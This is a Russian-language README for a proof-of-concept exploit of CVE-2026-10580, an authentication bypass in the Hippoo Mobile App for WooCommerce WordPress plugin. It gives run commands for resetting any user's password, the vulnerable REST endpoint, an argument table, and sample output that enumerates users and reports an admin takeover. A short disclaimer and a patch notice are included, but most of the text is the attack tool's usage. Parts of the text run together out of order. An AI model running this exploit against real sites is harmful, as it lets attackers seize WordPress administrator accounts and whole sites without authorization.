
PoC-эксплойт для CVE-2026-10580 — обход аутентификации в Hippoo Mobile App for WooCommerce <= 1.9.4, приводящий к захвату учётной записи администратора
Этот инструмент является доказательством концепции эксплойта для CVE-2026-10580, уязвимости обхода аутентификации, затрагивающей плагин WordPress Hippoo Mobile App for WooCommerce (версии <= 1.9.4). Уязвимость позволяет неаутентифицированным злоумышленникам сбрасывать пароль любого пользователя, включая администраторов, что приводит к полному захвату сайта.
⚠️ Важно: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно.
requestsУстановите зависимости:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
Эксплойт с ID администратора по умолчанию (1) и проверкой SSL:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
Нацелиться на конкретный ID пользователя и отключить проверку SSL:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
Запуск без баннера:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] Found 3 user(s)
- User ID: 1 | Username: admin | Role: administrator
- User ID: 2 | Username: editor_user | Role: editor
- User ID: 3 | Username: subscriber1 | Role: subscriber
╔══════════════════════════════════════════════════════════════╗
║ ADMIN TAKEOVER SUCCESSFUL ║
╚══════════════════════════════════════════════════════════════╝
Target: https://example.com
Login: https://example.com/wp-admin
Username: admin
Password: PwnedCVE2026!!
Если вы используете плагин Hippoo, немедленно обновите его до исправленной версии (>1.9.4). Дополнительно:
/wp-json/wc-hippoo/v1/ext/wp/v2/usersЭтот проект лицензирован под лицензией MIT. Подробности см. в файле LICENSE.
0xgh057r3c0n
Автор не несет ответственности за любое неправомерное использование этого инструмента. Используйте ответственно и только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.
| Аргумент | Описание |
|---|
-t, --target | URL целевого сайта WordPress (например, https://example.com) |
-p, --password | Новый пароль для учетной записи администратора |
-i, --id | ID пользователя для захвата (по умолчанию: 1) |
-k, --insecure | Пропустить проверку SSL-сертификата |
--no-banner | Скрыть ASCII-баннер |